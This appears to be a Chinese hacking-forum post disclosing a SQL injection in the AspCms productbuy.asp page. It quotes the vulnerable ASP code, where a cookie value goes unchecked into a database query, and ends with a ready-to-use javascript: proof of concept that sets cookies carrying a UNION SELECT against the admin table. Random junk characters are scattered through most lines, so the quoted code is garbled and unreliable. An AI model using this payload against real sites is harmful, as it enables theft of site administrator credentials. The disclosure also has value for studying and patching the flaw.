好久没上土司了,上来一看发现在删号名单内.....' E( n; |, \' J c$ B2 v+ j
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。+ N- t% @2 S% ^ U7 i( v' J3 X, U
废话不多说,看代码:
- K& n& k& O# _ t8 e( `
2 {, r4 E3 Z& }% c) X) S- v<%! h' z4 l# N6 C, L! s
& b; X. w6 g' m- J. x
if action = "buy" then- r. ?2 P- G2 L6 [) a. }* f
; Q0 F# b. X; `+ c" j- P, E' ~7 { addOrder()
! `: q1 m l1 M6 N/ u8 T w
@: t1 Y$ O' ]4 @$ h; X& Pelse+ m1 T5 ?* F: M9 r9 ]
, M$ l1 s7 b, }, B7 `
echoContent()
' a& O9 P+ B8 K4 b
* Q% e) @0 O1 b& \- Gend if
" |9 u% e0 F: R3 W! v' I/ v! @
. m. J+ z+ A6 p3 @% ?
, Z- P0 d u" \7 l3 C
2 j- ]8 q6 [, |2 Y9 B$ `* w……略过
# `+ w7 d5 f* F& I; |( B& g. k
# P' q$ @$ G( u# e0 [7 {" ?
6 b5 C0 m. O. |$ F7 w2 d1 H; T+ q9 P% j/ q4 G- R
Sub echoContent(), j# z0 K! a1 V! g, |: w
( ~1 P2 S2 s5 ^ dim id
+ |1 _. k% f- J& I6 c* y
' g; y0 T+ n& m2 n. L/ x; d id=getForm("id","get"), l; ?8 \3 Y$ t, u
/ U% g' H+ h* `* N; g
0 u, l& [( U* {3 C5 E
# j0 T5 x4 k& b% K) R$ P if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
+ G6 X: `) r7 D9 Z( ]+ n- j& p1 R; x" b* z, K% A
7 _8 x: }- U! n* n$ K1 A% @& `% d, o6 G6 g4 w$ E9 r6 m% q
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")5 u; Y; U; h4 b5 p; A- G
. J0 r; q& _( t M3 M dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct" R+ z+ v- V$ k7 C: r+ G
! `9 A6 b$ g: K7 T0 e Dim templatePath,tempStr
* ~+ g: L( P9 s( X: z* F4 x3 C1 d
5 M0 K2 t# u) Y; z templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
9 K+ B7 F4 D9 V* N) }+ |- v* W3 z7 N
$ W- U, Z7 l) q/ S/ s. |
! @+ h: g" H2 { set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1"). L# V" Y2 u+ A
; h" r2 a6 X0 B# `0 B
selectproduct=rsObj(0)6 U* q4 W& U' J
$ Y/ t6 A- W3 c% T; h
8 T. W" c2 [( Z
/ U+ _8 J0 A2 Y+ b! Y; Y( \5 ? Dim linkman,gender,phone,mobile,email,qq,address,postcode/ X/ Z+ U2 b2 E6 c- L8 V
$ C1 A: T9 r) h7 [$ G+ z: q if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
% v! \$ u9 A! |! |6 @4 C* ~* I, v1 ~, I* `
if rCookie("loginstatus")=1 then
) ~# |; L" z8 i7 K6 u1 O
6 V7 x3 h! Z" u9 l set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
5 _" X* J) w: t: |+ f6 `* u2 M
linkman=rsObj("truename"): a4 j" Z1 ^! Y8 {& M
2 j ^+ y' t3 h* [5 ?/ P k' B" P
gender=rsObj("gender")
p) u H, T0 @# u9 J; c. Z% l3 n# w# n& L2 w8 n: j# _
phone=rsObj("phone")
9 P0 |2 Q( W' i" F
( A3 o# ~9 a4 W- k$ ? G+ X mobile=rsObj("mobile")9 n! Q! [5 s0 a% a G" \# Z$ ?
. A" o9 T$ D0 D8 L/ D4 H$ g email=rsObj("email")
% ~, U7 t% z; K6 Z* g; B6 I3 P
! E) K/ I( U3 n5 x qq=rsObj("qq")
+ t# k7 D. W. L" t9 W7 t3 Z8 B; g
1 S9 z* s7 }% o) w1 P address=rsObj("address")
+ B v6 N1 C* B \6 }( W4 V/ E+ v
postcode=rsObj("postcode")
, O( S: B( \6 O" Z2 }6 n q4 K" b: j8 ?+ @8 k2 C' ?, @7 w9 B3 A8 E3 H
else 8 d, r: ^% {( ?4 m( G1 N
9 z" C! h" `8 i1 { gender=1
# V$ @8 J3 T' E! u# [0 J8 Q$ v2 v d+ y
end if
. w4 k( y" p2 a% T, \# k
5 \: B4 H: r5 T1 k" | rsObj.close()8 Z/ P$ c' ~6 g3 T6 Y7 k
0 S6 b2 l2 y& E" J- @& } 7 u1 j1 s% W* {9 R
; i9 b# G4 M8 ^ G4 y* m with templateObj
" {+ Q/ s7 Y8 r, r+ ~* c; h1 M8 C0 j5 k. ~$ X" D
.content=loadFile(templatePath) 9 b5 T& S2 M# Z! O7 P+ X2 k5 u/ s6 Z
) N9 r9 q$ o. |6 L% E+ Q
.parseHtml()
6 g+ t: W; b: t) `* C3 J Y, u6 o' O
: U0 F& [6 j5 o. ]( c .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
$ c1 u Q- d5 z* Q9 K' h( S! N
( S! ^; v6 T: @# D4 ^, E .content=replaceStr(.content,"[aspcms:linkman]",linkman)
~' h( n& g4 I
2 n: O7 J7 b3 M( T .content=replaceStr(.content,"[aspcms:gender]",gender) ) q: a' R6 G# G8 G. K% Z" b& Z! E: [% H
& b: R5 H ]6 `* g4 P* @' T; \ .content=replaceStr(.content,"[aspcms:phone]",phone) ; |, q* ?0 X/ w, \& y- a
- r6 ]: V3 F4 f; P .content=replaceStr(.content,"[aspcms:mobile]",mobile) $ w7 t3 Z$ V; }8 z
, H- U6 u! h( R8 B$ [8 Y2 f2 U+ _6 x8 [
.content=replaceStr(.content,"[aspcms:email]",email) 6 k$ T: s# \, J3 j2 O
3 o% ^! \' N3 U2 g
.content=replaceStr(.content,"[aspcms:qq]",qq)
! _( k/ ?1 x; q: j5 c3 ~3 z: U* B* C( i7 n( B9 ]. j/ J
.content=replaceStr(.content,"[aspcms:address]",address)
! v+ C1 N t+ i7 H- R9 c( f0 V$ |7 X( k
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
/ A* b+ q6 Q6 x: ~5 C' T" y- b' |, O3 Z; V+ a2 H% M3 H8 V
.parseCommon() ( A" ]4 n6 }* o! ]: U' }3 L
& v9 B# N$ G. i! x9 i1 R echo .content + q( @5 l K0 y+ L# A4 ^4 y
! S* f* \# }# U* p) G end with
; N' S1 k8 k, j' X }7 O" g/ C
n7 _7 x* s' a( Y# H9 @ set templateobj =nothing : terminateAllObjects
4 G* n! O- _! g$ ?3 T: ~! y6 z* j5 f
) {, A# J! N% b V+ m# |; z( nEnd Sub
. I2 d% T. x! C% u3 o G8 S漏洞很明显,没啥好说的 ^ \1 Z" A# B( k, c/ b8 h
poc:1 v9 q" v/ g8 I; l/ z, x
, W- H' T1 U! ?
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子# S. @& M. \7 S z" I$ W" D' j
( N! ?% c) {7 E4 E7 N! B |